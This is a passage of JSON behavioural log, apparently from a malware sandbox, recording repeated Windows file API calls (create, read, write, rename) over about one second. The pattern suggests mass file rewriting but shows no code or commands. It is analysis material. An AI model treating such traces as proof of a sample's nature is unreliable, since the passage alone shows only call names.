17:41:46,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,799", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,809", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,819", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,829", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,839", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,860", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,870", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,880", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,890", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,940", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,080", "api": 